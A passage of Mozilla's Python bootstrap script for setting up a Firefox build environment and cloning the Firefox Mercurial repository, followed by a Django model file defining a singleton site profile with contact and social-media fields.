args['flavor'] = platform.system() elif sys.platform.startswith('win32') or sys.platform.startswith('msys'): cls = WindowsBootstrapper if cls is None: raise NotImplementedError('Bootstrap support is not yet available ' 'for your OS.') self.instance = cls(**args) def bootstrap(self): if self.choice is None: # Like ['1. Firefox for Desktop', '2. Firefox for Android Artifact Mode', ...]. labels = ['%s. %s' % (i + 1, name) for (i, (name, _)) in enumerate(APPLICATIONS_LIST)] prompt = APPLICATION_CHOICE % '\n'.join(labels) prompt_choice = self.instance.prompt_int(prompt=prompt, low=1, high=len(APPLICATIONS)) name, application = APPLICATIONS_LIST[prompt_choice-1] elif self.choice not in APPLICATIONS.keys(): raise Exception('Please pick a valid application choice: (%s)' % '/'.join(APPLICATIONS.keys())) else: name, application = APPLICATIONS[self.choice] self.instance.install_system_packages() # Like 'install_browser_packages' or 'install_mobile_android_packages'. getattr(self.instance, 'install_%s_packages' % application)() hg_installed, hg_modern = self.instance.ensure_mercurial_modern() self.instance.ensure_python_modern() # The state directory code is largely duplicated from mach_bootstrap.py. # We can't easily import mach_bootstrap.py because the bootstrapper may # run in self-contained mode and only the files in this directory will # be available. We /could/ refactor parts of mach_bootstrap.py to be # part of this directory to avoid the code duplication. state_dir, _ = get_state_dir() if not os.path.exists(state_dir): if not self.instance.no_interactive: choice = self.instance.prompt_int( prompt=STATE_DIR_INFO.format(statedir=state_dir), low=1, high=2) if choice == 1: print('Creating global state directory: %s' % state_dir) os.makedirs(state_dir, mode=0o770) state_dir_available = os.path.exists(state_dir) # Possibly configure Mercurial if the user wants to. # TODO offer to configure Git. if hg_installed and state_dir_available: configure_hg = False if not self.instance.no_interactive: choice = self.instance.prompt_int(prompt=CONFIGURE_MERCURIAL, low=1, high=2) if choice == 1: configure_hg = True else: configure_hg = self.hg_configure if configure_hg: configure_mercurial(self.instance.which('hg'), state_dir) # Offer to clone if we're not inside a clone. checkout_type = current_firefox_checkout(check_output=self.instance.check_output, hg=self.instance.which('hg')) have_clone = False if checkout_type: have_clone = True elif hg_installed and not self.instance.no_interactive: dest = raw_input(CLONE_MERCURIAL) dest = dest.strip() if dest: dest = os.path.expanduser(dest) have_clone = clone_firefox(self.instance.which('hg'), dest) if not have_clone: print(SOURCE_ADVERTISE) print(self.finished % name) # Like 'suggest_browser_mozconfig' or 'suggest_mobile_android_mozconfig'. getattr(self.instance, 'suggest_%s_mozconfig' % application)() def update_vct(hg, root_state_dir): """Ensure version-control-tools in the state directory is up to date.""" vct_dir = os.path.join(root_state_dir, 'version-control-tools') # Ensure the latest revision of version-control-tools is present. update_mercurial_repo(hg, 'https://hg.mozilla.org/hgcustom/version-control-tools', vct_dir, '@') return vct_dir def configure_mercurial(hg, root_state_dir): """Run the Mercurial configuration wizard.""" vct_dir = update_vct(hg, root_state_dir) # Run the config wizard from v-c-t. args = [ hg, '--config', 'extensions.configwizard=%s/hgext/configwizard' % vct_dir, 'configwizard', ] subprocess.call(args) def update_mercurial_repo(hg, url, dest, revision): """Perform a clone/pull + update of a Mercurial repository.""" args = [hg] # Disable common extensions whose older versions may cause `hg` # invocations to abort. disable_exts = [ 'bzexport', 'bzpost', 'firefoxtree', 'hgwatchman', 'mozext', 'mqext', 'qimportbz', 'push-to-try', 'reviewboard', ] for ext in disable_exts: args.extend(['--config', 'extensions.%s=!' % ext]) if os.path.exists(dest): args.extend(['pull', url]) cwd = dest else: args.extend(['clone', '--noupdate', url, dest]) cwd = '/' print('=' * 80) print('Ensuring %s is up to date at %s' % (url, dest)) try: subprocess.check_call(args, cwd=cwd) subprocess.check_call([hg, 'update', '-r', revision], cwd=dest) finally: print('=' * 80) def clone_firefox(hg, dest): """Clone the Firefox repository to a specified destination.""" print('Cloning Firefox Mercurial repository to %s' % dest) # We create an empty repo then modify the config before adding data. # This is necessary to ensure storage settings are optimally # configured. args = [ hg, # The unified repo is generaldelta, so ensure the client is as # well. '--config', 'format.generaldelta=true', 'init', dest ] res = subprocess.call(args) if res: print('unable to create destination repo; please try cloning manually') return False # Strictly speaking, this could overwrite a config based on a template # the user has installed. Let's pretend this problem doesn't exist # unless someone complains about it. with open(os.path.join(dest, '.hg', 'hgrc'), 'ab') as fh: fh.write('[paths]\n') fh.write('default = https://hg.mozilla.org/mozilla-unified\n') fh.write('\n') # The server uses aggressivemergedeltas which can blow up delta chain # length. This can cause performance to tank due to delta chains being # too long. Limit the delta chain length to something reasonable # to bound revlog read time. fh.write('[format]\n') fh.write('# This is necessary to keep performance in check\n') fh.write('maxchainlen = 10000\n') res = subprocess.call([hg, 'pull', 'https://hg.mozilla.org/mozilla-unified'], cwd=dest) print('') if res: print('error pulling; try running `hg pull https://hg.mozilla.org/mozilla-unified` manually') return False print('updating to "central" - the development head of Gecko and Firefox') res = subprocess.call([hg, 'update', '-r', 'central'], cwd=dest) if res: print('error updating; you will need to `hg update` manually') print('Firefox source code available at %s' % dest) return True def current_firefox_checkout(check_output, hg=None): """Determine whether we're in a Firefox checkout. Returns one of None, ``git``, or ``hg``. """ HG_ROOT_REVISIONS = set([ # From mozilla-central. '8ba995b74e18334ab3707f27e9eb8f4e37ba3d29', ]) path = os.getcwd() while path: hg_dir = os.path.join(path, '.hg') git_dir = os.path.join(path, '.git') if hg and os.path.exists(hg_dir): # Verify the hg repo is a Firefox repo by looking at rev 0. try: node = check_output([hg, 'log', '-r', '0', '-T', '{node}'], cwd=path) if node in HG_ROOT_REVISIONS: return 'hg' # Else the root revision is different. There could be nested # repos. So keep traversing the parents. except subprocess.CalledProcessError: pass # TODO check git remotes or `git rev-parse -q --verify $sha1^{commit}` # for signs of Firefox. elif os.path.exists(git_dir): return 'git' path, child = os.path.split(path) if child == '': break return None
cstipkovic/spidermonkey-research
python/mozboot/mozboot/bootstrap.py
Python
mpl-2.0
14,641
from django.db import models from ckeditor.fields import RichTextField from solo.models import SingletonModel from phonenumber_field import modelfields as phonenumber_models from foti.models import Foto from opere.models import Opera from scritti.models import Scritto class Profile(SingletonModel): name = models.CharField( max_length=255, blank=False, ) _title = models.CharField( max_length=255, blank=True, help_text='Site title used in tab. Defaults to \'name\' if left blank.', ) tagline = models.CharField( max_length=515, blank=True, help_text='Just a quick description (e.g. "Waddling through the world in search of adventure and snuggles" to go with "Nomad Penguin"', ) intro = RichTextField( max_length=1024, blank=True, ) bio_title = models.CharField(max_length=64, blank=True) bio_image = models.ImageField(upload_to='profile', blank=True) bio = RichTextField( max_length=4096, blank=True, ) # Contact Info _contact_name = models.CharField( max_length=64, blank=True, help_text='Just in case you didn\'t use your real name up above. You can leave this blank if you want.', ) address = models.CharField( max_length=64, blank=True, ) city = models.CharField( max_length=64, blank=True, ) state = models.CharField( max_length=64, blank=True, ) country = models.CharField( max_length=128, blank=True ) zip_code = models.CharField( max_length=16, blank=True, help_text='"Postal Code", technically.' ) email = models.EmailField( max_length=128, blank=True ) phone = phonenumber_models.PhoneNumberField(blank=True) website = models.URLField(blank=True, help_text='In case you have another one, I guess?') twitter = models.URLField(blank=True) facebook = models.URLField(blank=True) instagram = models.URLField(blank=True) linkedin = models.URLField(blank=True) pinterest = models.URLField(blank=True) tumblr = models.URLField(blank=True) # Someday we'll change the first one to accept Opera homepage_features = models.ManyToManyField(Scritto, related_name='facade_homepage_features', help_text='Max of 6!', blank=True) writing_features = models.ManyToManyField(Scritto, related_name='facade_writing_features', help_text='Max of 6!', blank=True) photo_features = models.ManyToManyField(Foto, related_name='facade_photo_features', help_text='Max of 6!', blank=True) @property def title(self): return self._title or self.name @property def fullname(self): return self._contact_name or self.name
mhotwagner/backstage
facade/models.py
Python
mit
2,837